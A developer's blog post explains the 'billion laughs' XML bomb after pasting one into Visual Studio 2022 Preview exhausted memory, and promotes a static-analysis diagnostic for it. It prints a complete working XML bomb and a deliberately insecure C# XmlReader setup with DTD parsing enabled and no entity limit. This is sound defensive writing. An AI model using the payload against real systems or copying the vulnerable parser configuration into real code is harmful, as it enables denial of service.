DEV Community

Sergey Vasiliev
Sergey Vasiliev

Posted on

How Visual Studio 2022 ate up 100 GB of memory and what XML bombs had to do with it

In April 2021 Microsoft announced a new version of its IDE – Visual Studio 2022 – while also announcing that the IDE would be 64-bit. We've been waiting for this for so long – no more 4 GB memory limitations! However, as it turned out, it's not all that simple...

0865_VS2022_XMLBomb/image1.png

By the way, if you missed it, here's a link to the announcement post.

But let's get to the matter in question. I reproduced this problem on the latest (available at the time of writing) Visual Studio 2022 version - 17.0.0 Preview 3.1.

To reproduce this, the following is sufficient:

  • use the Blank Solution template to create a new project;
  • add an XML file to the solution.

After this, try to copy the following text to the XML file:



<?xml version="1.0"?>
<!DOCTYPE lolz [
 <!ENTITY lol "lol">
 <!ELEMENT lolz (#PCDATA)>
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
 <!ENTITY lol10 "&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;&lol9;">
 <!ENTITY lol11 
   "&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;&lol10;">
 <!ENTITY lol12 
   "&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;&lol11;">
 <!ENTITY lol13 
   "&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;&lol12;">
 <!ENTITY lol14 
   "&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;&lol13;">
 <!ENTITY lol15 
   "&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;&lol14;">
]>
<lolz>&lol15;</lolz>


Enter fullscreen mode Exit fullscreen mode

Now go make yourself a cup of coffee, get back to your computer - and watch Visual Studio eat up more and more RAM.

0865_VS2022_XMLBomb/image2.png

You may have two questions:

  1. Why create some weird XML and add it to projects?
  2. What is happening here?

Let's figure this out. To do this, we'll need to understand why processing XML files carelessly can be dangerous and what the PVS-Studio analyzer has to do with all this.

SAST in PVS-Studio

We continue to actively develop PVS-Studio as a SAST solution. If we talk about the C# analyzer, the main focus here is OWASP Top 10 2017 (that's the latest version available - we are looking forward to an update!) support. By the way, if you missed it, not too long ago we added the taint analysis feature. You can read about it here.

So, I created (or, to be exact, attempted to create) a sample project to test the analyzer. The fact is, one of the OWASP Top 10 categories we are developing diagnostic rules for, is A4:2017-XML External Entities (XXE). It has to do with incorrect XML file processing that makes applications vulnerable to attacks. What does incorrect processing mean? Often it's excessive trust to input data (a perpetual problem that causes many vulnerabilities) combined with XML parsers that lack sufficient limitations.

As a result, if the files are compromised, this may cause various unpleasant consequences. There are two main problems here: data disclosure and denial of service. Both have corresponding CWEs:

I'll leave CWE-611 for the other day. Today we need CWE-776.

XML bombs (billion laughs attack)

I'll briefly describe the essence of the problem. If you'll want to know more, many resources on the internet will provide you with the information you need.

The XML standard assumes the use of DTD (document type definition). DTD enables you to use so-called XML entities.

The entity syntax is simple:



<!ENTITY myEntity "Entity value">


Enter fullscreen mode Exit fullscreen mode

Then you can get the entity value as follows:



&myEntity;


Enter fullscreen mode Exit fullscreen mode

The catch here is, entities can expand not only into strings (as in our case - "Entity value"), but also into sequences of other entities. For example:



<!ENTITY lol "lol">
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">


Enter fullscreen mode Exit fullscreen mode

As a result, when expanding the 'lol1' entity, we get a string that looks like this:



lollollollollollollollollollol


Enter fullscreen mode Exit fullscreen mode

You can go further and define the 'lol2' entity by expanding it through 'lol1':



<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">


Enter fullscreen mode Exit fullscreen mode

Then when expanding the 'lol2' entity, you get the following output:



lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollol


Enter fullscreen mode Exit fullscreen mode

How about going a level deeper and defining the 'lol3' entity?



<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">


Enter fullscreen mode Exit fullscreen mode

Here's the output you get when expanding it:



lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
lollollollollollollollollollollollollollollollollollollollollollollollol
....


Enter fullscreen mode Exit fullscreen mode

The XML file we used at the beginning of the article was generated with the same principle. Now, I think you see where the "billion laughs" name comes from. So, it turns out, if the XML parser is configured incorrectly (DTD processing is enabled and maximum entity size is not limited) - nothing good happens when this 'bomb' is processed.

Talking about C#, vulnerable code is easiest to demonstrate with an XmlReader type example:



var pathToXmlBomb = @"D:\XMLBomb.xml";
XmlReaderSettings rs = new XmlReaderSettings()
{
  DtdProcessing = DtdProcessing.Parse,
  MaxCharactersFromEntities = 0
};

using var reader = XmlReader.Create(File.OpenRead(pathToXmlBomb), rs);
while (reader.Read())
{
  if (reader.NodeType == XmlNodeType.Text)
    Console.WriteLine(reader.Value);
}


Enter fullscreen mode Exit fullscreen mode

If I configure my XmlReader this way, I am almost telling the intruder: "Come on, blow this up!".

There are two reasons for this:

  • DTD processing is enabled;
  • the restriction for a maximum number of characters from entities has been removed and the file can grow unhindered.

By default, processing of DTD entities is forbidden: the DtdProcessing property is set to Prohibit. The maximum number of characters from entities is also limited (starting with .NET Framework 4.5.2). So in the modern .NET you have fewer and fewer opportunities to shoot yourself in the foot. This is still possible though - if you configure parsers incorrectly.

Coming back to Visual Studio 2022

It seems that in Visual Studio 2022, when we copied our XML bomb, both conditions were true:

  • DTD processing started;
  • no limitations were set - which caused the ever-increasing memory consumption.

We examined the process to see what was happening. What we found confirmed our expectations.

0865_VS2022_XMLBomb/image3.png

The process list showed that the main thread was processing with the XML file. That caused GUI to freeze, and IDE did not respond to any attempts to revive it. with the XML file.

The VS Main thread's call stack showed that the thread was busy processing DTD (the ParseDtd method execution)

0865_VS2022_XMLBomb/image4.png

During the experiment I was wondering, why does Visual Studio run DTD processing at all? Why doesn't it display XML as-is? I got my answer when experimenting with a small XML bomb (same approach, lighter load).

It seems that the whole point is to display possible values of entities in the editor "on the fly".

0865_VS2022_XMLBomb/image5.png

Small values are processed successfully, but problems arise when XML entities start growing.

Of course, after my investigation, I had to write a bug report.

Conclusion

This is how we - unexpectedly - saw an XML bomb in action. It was very interesting to explore a real-life popular application and find something like this.

Just as I am writing this, we are developing a diagnostic to search for code that is vulnerable to XML file processing problems. We expect to release it with PVS-Studio 7.15. If you want to see what the analyzer can do right now, I encourage you to download it and try it on your project. ;)

As always, subscribe to my Twitter so as not to miss anything interesting.

Top comments (7)

Collapse
 
dkhd profile image
Diky Hadna 💡

Q: How much memory do you have?
A: Yes.

Collapse
 
abhinav1217 profile image
Abhinav Kulshreshtha

No seriously, How much memory does the author have? And to think I was feeling proud after upgrading my 8 year old laptop, from 8gb ram to 16gb ram.

Collapse
 
dkhd profile image
Diky Hadna 💡

Hi @vasilievserg let us sleep peacefully tonight :))) How much memory do you have?

Thread Thread
 
_sergvasiliev_ profile image
Sergey Vasiliev

Hi @dkhd , @abhinav1217
The machine, on which we performed the experiments, has 128 GB RAM. :)

Collapse
 
liorbanai profile image
Lior Banai

Thanks for sharing. Now in need to go and check my Analogy Log Viewer in Github which has xml log parser 🙂

Collapse
 
rmed1na profile image
Rolando Medina

And I thought I could complain on 16GB RAM and 4GB RAM usage from VS2022. Can't be safe even with 128GB!!!

Collapse
 
sandhilt profile image
Bruno Ochotorena

It's infamous LOL bomb.